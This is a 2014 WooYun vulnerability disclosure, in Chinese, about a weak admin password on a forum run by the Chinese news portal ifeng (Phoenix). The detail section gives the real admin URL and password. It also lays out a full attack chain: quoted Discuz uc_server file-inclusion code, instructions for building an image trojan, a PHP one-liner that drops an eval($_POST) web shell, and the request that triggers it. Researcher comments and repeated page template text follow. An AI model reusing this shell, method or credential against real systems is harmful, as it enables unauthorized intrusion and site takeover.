凤凰网某论坛后台uc_server弱口令可getshell(神器扫的)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085540

漏洞标题：凤凰网某论坛后台uc_server弱口令可getshell(神器扫的)

漏洞作者：路人甲

提交时间：2014-12-02 11:37

修复时间：2015-01-16 11:38

公开时间：2015-01-16 11:38

漏洞类型：后台弱口令

危害等级：高

自评Rank：13

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-02：细节已通知厂商并且等待厂商处理中
2014-12-02：厂商已经确认，细节仅向厂商公开
2014-12-12：细节向核心白帽子及相关领域专家公开
2014-12-22：细节向普通白帽子公开
2015-01-01：细节向实习白帽子公开
2015-01-16：细节向公众公开

简要描述：

用神器发现凤凰网某论坛后台存在弱口令

详细说明：

http://newbbs.play.ifeng.com/uc_server/admin.php q1w2e3r4
uc_server后台文件包含： WooYun: Discuz UC_Server 本地文件包含漏洞（有条件限制）

function onping() {
		$ip = getgpc('ip');
		$url = getgpc('url');
		$appid = intval(getgpc('appid'));
		$app = $_ENV['app']->get_app_by_appid($appid);
		$status = '';
		if($app['extra']['apppath'] && @include $app['extra']['apppath'].'./api/'.$app['apifilename']) {
			$uc_note = new uc_note();
			$status = $uc_note->test($note['getdata'], $note['postdata']);

在论坛帖子中上传一张图片木马
http://newbbs.play.ifeng.com/data/attachment/forum/201412/02/120245hir9los3postrbyk.jpg
图片木马制作：copy 1.jpg/b+1.txt/a 2.jpg
图片随便找一张
文本文件内容：

<?php fputs(fopen('f.php','w'),'<?php eval($_POST[f])?>');?>

后台添加应用（这里注意一下路径）

http://newbbs.play.ifeng.com/uc_server/admin.php?m=app&a=ping&appid=【应用id】
在uc_server目录下会生成f.php 密码f
菜刀连接之

漏洞证明：

Done ^-^

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-12-02 15:06

厂商回复：

谢谢。

漏洞评价：

2014-12-02 12:28 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

什么神器啊
2014-12-02 12:29 | 拖鞋王子 ( 实习白帽子 | Rank:43 漏洞数:4 | 安阳安阳)

@疯狗你猜哈
2014-12-02 13:19 | mtfly ( 路人 | Rank:26 漏洞数:6 | 啥都不会)

来看神器
2014-12-02 13:46 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1：5 无限量收 [平台担保]))

@疯狗莫非是社区发的那个？
2014-12-02 14:00 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)

什么神器啊
2014-12-02 14:58 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

神器发出来……
2015-01-16 20:13 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效，坚持好的习惯千万不要放弃)

求神器鼎鼎大名
2015-01-21 10:56 | hack2012 ( 实习白帽子 | Rank:31 漏洞数:3 | 关注信息安全 http://www.waitalone.cn/)

求神器呀。。。
2015-03-09 00:17 | 随页清风 ( 普通白帽子 | Rank:131 漏洞数:41 | 剑有所指)

什么神奇啊啊。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085540

漏洞标题：凤凰网某论坛后台uc_server弱口令可getshell(神器扫的)

相关厂商：凤凰网

漏洞作者：路人甲

提交时间：2014-12-02 11:37

修复时间：2015-01-16 11:38

公开时间：2015-01-16 11:38

漏洞类型：后台弱口令

危害等级：高

自评Rank：13

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085540

漏洞标题：凤凰网某论坛后台uc_server弱口令可getshell(神器扫的)

相关厂商：凤凰网

漏洞作者： 路人甲

提交时间：2014-12-02 11:37

修复时间：2015-01-16 11:38

公开时间：2015-01-16 11:38

漏洞类型：后台弱口令

危害等级：高

自评Rank：13

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-085540"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云